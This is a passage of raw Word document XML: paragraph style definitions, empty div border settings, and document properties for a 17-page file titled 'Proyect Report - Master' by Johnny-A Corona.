      <w:spacing w:after="100"/>
      <w:ind w:left="240"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C57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251480">
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="706372907">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1076631329">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="593710340">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E0951-D4E2-4FD7-A813-ABA80D4B6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17</Pages>
  <Words>1907</Words>
  <Characters>10494</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Proyect Report - Master</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>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Proyect Report - Master</dc:title>
  <dc:subject/>
  <dc:creator>Johnny-A Corona</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Johnny-A Corona</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-14T20:09:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-15T07:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>